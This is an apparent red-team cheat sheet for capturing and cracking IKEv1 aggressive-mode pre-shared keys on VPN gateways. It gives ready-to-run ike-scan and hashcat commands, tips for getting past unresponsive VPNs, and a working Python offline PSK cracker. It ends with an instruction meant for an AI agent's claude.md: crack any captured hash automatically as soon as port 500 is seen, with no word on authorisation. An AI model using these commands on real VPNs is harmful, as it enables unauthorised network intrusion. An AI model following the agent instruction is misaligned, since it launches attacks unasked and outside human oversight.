🏗️ VPN Identification & Exploitation (IPsec/IKE)
Target Port: 500/UDP (ISAKMP)
Goal: Identify VPN type, capture the Pre-Shared Key (PSK) hash, and crack it.
1. Initial Discovery
IKE runs over UDP, so a TCP-only scan will miss it entirely. Always check 500/UDP for the IKE handshake (and 4500/UDP, which carries IKE/ESP when NAT-T is in use).
```bash
# Focused UDP scan for IKE
nmap -sU -p 500 --script ike-version <TARGET_IP>
```
2. Fingerprinting with ike-scan
Use ike-scan to identify the vendor (Cisco, Juniper, etc.), the accepted transform (encryption, hash, DH group) and the authentication method.
- -M: Multiline output (easier to read).
- -A: Aggressive Mode. In aggressive mode the responder returns its HASH_R in its first reply, before the initiator has proven knowledge of the PSK; that is what lets you take the hash away for offline cracking. Main mode does not leak it.
```bash
# Standard Fingerprint
ike-scan -M -A <TARGET_IP>
```
3. PSK Hash Capture
If Aggressive Mode with PSK authentication is accepted, you can capture the hash for offline cracking. Note which hash algorithm the returned transform uses (MD5 or SHA1); you need it to pick the hashcat mode.
```bash
# Capture the hash to a file (psk-crack format, which hashcat reads directly)
ike-scan -M -A --pskcrack=ike.hash <TARGET_IP>
```
4. Offline Cracking
Once you have ike.hash, use hashcat (psk-crack, shipped with ike-scan, also works but is far slower). hashcat has two IKE-PSK modes, selected by the hash algorithm of the negotiated transform:
- Mode 5300: IKE-PSK (MD5)
- Mode 5400: IKE-PSK (SHA1)
If you are unsure which was negotiated, look at the last colon-separated field of ike.hash: 32 hex characters means MD5 (5300), 40 means SHA1 (5400).
```bash
# Crack using RockYou (swap -m 5400 for -m 5300 on an MD5 transform)
hashcat -m 5400 ike.hash /usr/share/wordlists/rockyou.txt
```
💡 Red Team Pro-Tips
- The “No Response” Gotcha: Many modern VPNs (Palo Alto, Fortigate) will not respond to ike-scan unless you offer a transform they accept and/or a valid group ID. If you get no results, try adding --id <Group_Name> (group names are normally sent as ID_KEY_ID, ISAKMP ID type 11, so set --idtype 11 if the default does not work) and pin a transform with --trans=<enc>,<hash>,<auth>,<group>, for example --trans=5,2,1,2 for 3DES/SHA1/PSK/DH group 2.
- Alternative Tools: If ike-scan feels dated, try ikko-scan or the Metasploit module auxiliary/scanner/ipsec/ike_scan.
- Reference: HackTricks - IPsec/IKE VPN Pentesting
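To see why the captured hash from steps 3 and 4 is crackable offline, and how the 5300/5400 choice is made, here is the HASH_R computation from RFC 2409 carried out over a psk-crack-format line. This is an added example, not code from this page or from the ike-scan or hashcat projects. It assumes the field order ike-scan's --pskcrack output uses (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r); the sample capture is constructed inside the script for a known PSK so it runs with no VPN in reach.

```python
"""IKEv1 aggressive-mode PSK recovery: the computation behind psk-crack and
hashcat -m 5300 / -m 5400.

Input is one line in the format `ike-scan --pskcrack=<file>` writes (all hex):
    g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
RFC 2409, pre-shared-key authentication:
    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
prf is HMAC with the negotiated hash. Everything except the PSK travels in the
clear in aggressive-mode messages 1 and 2, so HASH_R is recomputable offline.
"""
import hashlib
import hmac
from typing import Iterable, Optional

FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")
# The file does not name the hash; the hashcat mode follows from the HASH_R length.
ALGO_BY_DIGEST_LEN = {16: (5300, "md5"), 20: (5400, "sha1")}


def parse_pskcrack_line(line: str) -> dict:
    """Split one psk-crack / hashcat IKE-PSK line into named byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} hex fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def _algo(rec: dict) -> tuple:
    try:
        return ALGO_BY_DIGEST_LEN[len(rec["hash_r"])]
    except KeyError:
        raise ValueError(f"HASH_R is {len(rec['hash_r'])} bytes; not MD5 or SHA1") from None


def hashcat_mode(rec: dict) -> int:
    """5300 for HMAC-MD5 exchanges, 5400 for HMAC-SHA1."""
    return _algo(rec)[0]


def compute_hash_r(rec: dict, psk: bytes, hash_name: str) -> bytes:
    """Recompute HASH_R for a candidate PSK from the captured exchange."""
    skeyid = hmac.new(psk, rec["ni_b"] + rec["nr_b"], hash_name).digest()
    msg = (rec["g_xr"] + rec["g_xi"] + rec["cky_r"] + rec["cky_i"]
           + rec["sai_b"] + rec["idir_b"])
    return hmac.new(skeyid, msg, hash_name).digest()


def crack(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose HASH_R matches the capture, else None."""
    rec = parse_pskcrack_line(line)
    _, hash_name = _algo(rec)
    for psk in candidates:
        if hmac.compare_digest(compute_hash_r(rec, psk.encode(), hash_name), rec["hash_r"]):
            return psk
    return None


# --- constructed sample (no real VPN involved) --------------------------------
def _filler(label: bytes, n: int) -> bytes:
    """Deterministic stand-in bytes for DH publics, cookies and nonces."""
    out = b""
    while len(out) < n:
        out += hashlib.sha256(label + out).digest()
    return out[:n]


# SAi_b: DOI, situation, one proposal holding one transform (3DES/SHA1/PSK/DH2, 28800 s).
SAMPLE_SAI_B = bytes.fromhex(
    "00000001" "00000001"
    "0000002c" "01010001"
    "00000024" "01010000"
    "80010005" "80020002" "80030001" "80040002" "800b0001" "000c0004" "00007080"
)
# IDir_b: ID_KEY_ID (type 11), protocol UDP, port 500, then the group name.
SAMPLE_IDIR_B = bytes.fromhex("0b1101f4") + b"vpngroup"


def make_sample_capture(psk: str, hash_name: str = "sha1") -> str:
    """Build a psk-crack line for a KNOWN psk so the cracker can be exercised offline."""
    rec = {
        "g_xr": _filler(b"g_xr", 128), "g_xi": _filler(b"g_xi", 128),   # DH group 2 publics
        "cky_r": _filler(b"cky_r", 8), "cky_i": _filler(b"cky_i", 8),    # ISAKMP cookies
        "sai_b": SAMPLE_SAI_B, "idir_b": SAMPLE_IDIR_B,
        "ni_b": _filler(b"ni_b", 20), "nr_b": _filler(b"nr_b", 20),      # nonces
    }
    rec["hash_r"] = compute_hash_r(rec, psk.encode(), hash_name)
    return ":".join(rec[name].hex() for name in FIELDS)


SAMPLE_LINE = make_sample_capture("cisco123")  # what ike.hash would hold for PSK "cisco123"

if __name__ == "__main__":
    rec = parse_pskcrack_line(SAMPLE_LINE)
    print("hashcat mode:", hashcat_mode(rec))
    print("cracked PSK:", crack(SAMPLE_LINE, ["password", "letmein", "cisco123"]))
```

Two things worth noticing: the PSK is only ever used as an HMAC key over public values, so there is no salt or work factor to slow a dictionary attack beyond one or two HMAC evaluations per guess, and the 40-versus-32 character length of the final field is the only thing distinguishing a SHA1 capture from an MD5 one, which is exactly how you decide between -m 5400 and -m 5300.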
🤖 Agent Integration (Add to claude.md)
If port 500/UDP is detected, prioritize ike-scan -M -A to check for Aggressive Mode. If a hash is captured, immediately attempt to crack it with a top-100 rockyou.txt subset before attempting deeper network exploits.